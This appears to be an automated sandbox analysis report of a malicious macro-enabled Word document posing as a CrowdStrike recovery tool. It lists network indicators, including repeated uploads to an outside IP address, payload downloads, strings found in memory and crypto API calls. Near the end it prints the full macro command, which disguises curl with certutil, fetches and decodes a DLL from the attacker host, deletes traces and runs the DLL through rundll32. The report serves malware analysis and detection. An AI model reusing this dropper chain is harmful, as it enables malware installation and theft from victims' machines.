Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------124d7d68b6a08cfd
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------837b5fa459944e4b
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------22f31a976d8ccacd
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------adf6f33d0b6a389e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------69954c1bb23fa243
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------54f15fd9c89287c7
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------862973e7d8c5e47a
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------218f885d1d1b01f5
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------21ef4c783e5ef6a8
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8d935b7ab73db626
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3e1bcbfd1ac49b71
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------453e0988638a690b
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------936caa563e76ca26
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------96aa930188ad95d0
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1c10b124588ac309
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7cef968b537d35d7
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------cd9315d0f70306a2
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1e25afe42fd86294
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------01894383c334ebcc
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2c7fc54d6c7c04d4
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bb4d8fe5f94a83f5
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a9d83593ce6d0496
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d2c48da37d466a87
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------450e1ee269f45e90
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0089c8439ef77124
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6e3e4c3b05a79857
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------521206e0c9b94cee
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3e6e6e56ae2cb74d
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------03a4310a76240f87
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0eac6bd829619dc3
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7554e3942a8f0809
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f183d5370c54fe4b
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------ca18e54d06119b02
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------998ba500316220a8
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2680bd2607a01273
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------03efbda4d78b7cdf
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a35d77128ae5cf6a

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_0087D8C0 recv,WSAGetLastError,

13_2_0087D8C0

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /payload2.txt HTTP/1.1Host: 172.104.160.126:8099User-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /payload2.txt HTTP/1.1Host: 172.104.160.126:8099User-Agent: curl/7.83.1Accept: /

Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>

Source: global traffic

DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4722Host: login.live.com

Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr	String found in binary or memory: http://172.104.160.
Source: rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520153129.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:5000/Upl
Source: rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500205273.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2530048667.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2450955120.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461645882.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540526722.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257938197.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2490004164.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416851318.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510132228.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479710584.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:5000/Uploadss
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/pay
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/pay0
Source: curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt-oC:
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt6
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt6ov
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txto
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txton
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txtr
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txts
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:80X99
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: document.xml	String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://curl.se/P
Source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: rundll32.exe	String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49268
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801

Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2

Source: C:\Windows\System32\rundll32.exe

Code function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,

16_2_00007FFD92C64B30

System Summary

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)			Name: MainFunc
Source: ~WRC0000.tmp.26.dr	OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)

Document contains an embedded VBA macro with suspicious strings

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
